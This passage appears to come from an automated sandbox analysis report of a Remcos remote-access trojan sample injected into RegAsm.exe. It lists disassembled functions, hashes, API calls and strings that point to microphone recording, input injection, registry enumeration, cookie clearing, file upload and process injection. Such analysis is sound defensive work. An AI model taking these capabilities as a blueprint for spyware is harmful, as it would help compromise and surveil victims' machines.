                                                        • Opcode ID: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
                                                        • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                        • Opcode Fuzzy Hash: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
                                                        • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CurrentProcess
                                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                        • API String ID: 2050909247-4242073005
                                                        • Opcode ID: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
                                                        • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                        • Opcode Fuzzy Hash: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
                                                        • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                        APIs
                                                        • _strftime.LIBCMT ref: 00401D50
                                                          • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                        • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                        • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                        • API String ID: 3809562944-243156785
                                                        • Opcode ID: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                                        • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                        • Opcode Fuzzy Hash: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                                        • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                        • int.LIBCPMT ref: 00410EBC
                                                          • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                          • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                        • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                        • __Init_thread_footer.LIBCMT ref: 00410F64
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                        • String ID: ,kG$0kG
                                                        • API String ID: 3815856325-2015055088
                                                        • Opcode ID: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                                        • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                        • Opcode Fuzzy Hash: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                                        • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                        APIs
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                        • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                        • waveInStart.WINMM ref: 00401CFE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                        • String ID: dMG$|MG$PG
                                                        • API String ID: 1356121797-532278878
                                                        • Opcode ID: eef3d83c920f1a8878cb9ae4af55a885980d63effcab8dea3858d63941c1ab5b
                                                        • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                        • Opcode Fuzzy Hash: eef3d83c920f1a8878cb9ae4af55a885980d63effcab8dea3858d63941c1ab5b
                                                        • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                          • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                          • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                          • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                        • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                        • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                        • TranslateMessage.USER32(?), ref: 0041D57A
                                                        • DispatchMessageA.USER32 ref: 0041D584
                                                        • GetMessageA.USER32 ref: 0041D591
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                        • String ID: Remcos
                                                        • API String ID: 1970332568-165870891
                                                        • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                        • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                        • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                        • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                        • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                        • Opcode Fuzzy Hash: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                        • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                        APIs
                                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                        • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                        • __alloca_probe_16.LIBCMT ref: 00454014
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                        • __freea.LIBCMT ref: 00454083
                                                        • __freea.LIBCMT ref: 0045408F
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                        • String ID:
                                                        • API String ID: 201697637-0
                                                        • Opcode ID: 3cd8063f553076ce798424c5fc2191fe96cf15845bda9c8b0815eea935c1a584
                                                        • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                        • Opcode Fuzzy Hash: 3cd8063f553076ce798424c5fc2191fe96cf15845bda9c8b0815eea935c1a584
                                                        • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                        APIs
                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                        • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                        • _free.LIBCMT ref: 00445515
                                                        • _free.LIBCMT ref: 0044552E
                                                        • _free.LIBCMT ref: 00445560
                                                        • _free.LIBCMT ref: 00445569
                                                        • _free.LIBCMT ref: 00445575
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                        • String ID: C
                                                        • API String ID: 1679612858-1037565863
                                                        • Opcode ID: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                                        • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                        • Opcode Fuzzy Hash: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                                        • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tcp$udp
                                                        • API String ID: 0-3725065008
                                                        • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                        • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                        • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                        • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 004018BE
                                                        • ExitThread.KERNEL32 ref: 004018F6
                                                        • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                          • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                        • String ID: PkG$XMG$NG$NG
                                                        • API String ID: 1649129571-3151166067
                                                        • Opcode ID: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                        • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                        • Opcode Fuzzy Hash: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                        • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                                        • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                                        • MoveFileW.KERNEL32 ref: 00407AA5
                                                        • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                          • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                          • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                        • String ID: .part
                                                        • API String ID: 1303771098-3499674018
                                                        • Opcode ID: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                                        • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                        • Opcode Fuzzy Hash: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                                        • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                        APIs
                                                        • SendInput.USER32 ref: 00419A25
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                        • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                          • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InputSend$Virtual
                                                        • String ID:
                                                        • API String ID: 1167301434-0
                                                        • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                        • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                        • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                        • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                        APIs
                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                        • _free.LIBCMT ref: 00444E87
                                                        • _free.LIBCMT ref: 00444E9E
                                                        • _free.LIBCMT ref: 00444EBD
                                                        • _free.LIBCMT ref: 00444ED8
                                                        • _free.LIBCMT ref: 00444EEF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$AllocateHeap
                                                        • String ID: KED
                                                        • API String ID: 3033488037-2133951994
                                                        • Opcode ID: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                        • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                        • Opcode Fuzzy Hash: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                        • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                        APIs
                                                        • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Enum$InfoQueryValue
                                                        • String ID: [regsplt]$xUG$TG
                                                        • API String ID: 3554306468-1165877943
                                                        • Opcode ID: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                                        • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                        • Opcode Fuzzy Hash: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                                        • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                        APIs
                                                        • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                                          • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                          • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEnumInfoOpenQuerysend
                                                        • String ID: xUG$NG$NG$TG
                                                        • API String ID: 3114080316-2811732169
                                                        • Opcode ID: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                                        • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                        • Opcode Fuzzy Hash: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                                        • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F918,?,00000000,?,00000001,?,000000FF,00000001,0043F918,?), ref: 004511F9
                                                        • __alloca_probe_16.LIBCMT ref: 00451231
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451282
                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451294
                                                        • __freea.LIBCMT ref: 0045129D
                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                        • String ID: PkGNG
                                                        • API String ID: 313313983-263838557
                                                        • Opcode ID: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                                        • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                        • Opcode Fuzzy Hash: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                                        • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                        APIs
                                                          • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                          • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                          • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                          • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                        • _wcslen.LIBCMT ref: 0041B7F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                        • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                        • API String ID: 37874593-122982132
                                                        • Opcode ID: 6e4530202917b19cbbea06c57cde587f82f9719f354b1f28db5066e5f2e92548
                                                        • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                        • Opcode Fuzzy Hash: 6e4530202917b19cbbea06c57cde587f82f9719f354b1f28db5066e5f2e92548
                                                        • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                        APIs
                                                          • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                          • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32 ref: 00413622
                                                          • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                        • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                        • API String ID: 1133728706-4073444585
                                                        • Opcode ID: b06b8fc2cb4d0c20ff9a3989f2efe758744c2eb59fc0991c33ed663883f7d139
                                                        • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                        • Opcode Fuzzy Hash: b06b8fc2cb4d0c20ff9a3989f2efe758744c2eb59fc0991c33ed663883f7d139
                                                        • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                                        • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                        • Opcode Fuzzy Hash: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                                        • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                        APIs
                                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                        • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                        • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                        Strings
                                                        • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$CloseHandleOpen$FileRead
                                                        • String ID: http://geoplugin.net/json.gp
                                                        • API String ID: 3121278467-91888290
                                                        • Opcode ID: b01590e2803785cbe291e15456c0bc7acaef33a62877e88be574051367ac5976
                                                        • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                        • Opcode Fuzzy Hash: b01590e2803785cbe291e15456c0bc7acaef33a62877e88be574051367ac5976
                                                        • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                        APIs
                                                          • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                        • _free.LIBCMT ref: 00450FC8
                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                        • _free.LIBCMT ref: 00450FD3
                                                        • _free.LIBCMT ref: 00450FDE
                                                        • _free.LIBCMT ref: 00451032
                                                        • _free.LIBCMT ref: 0045103D
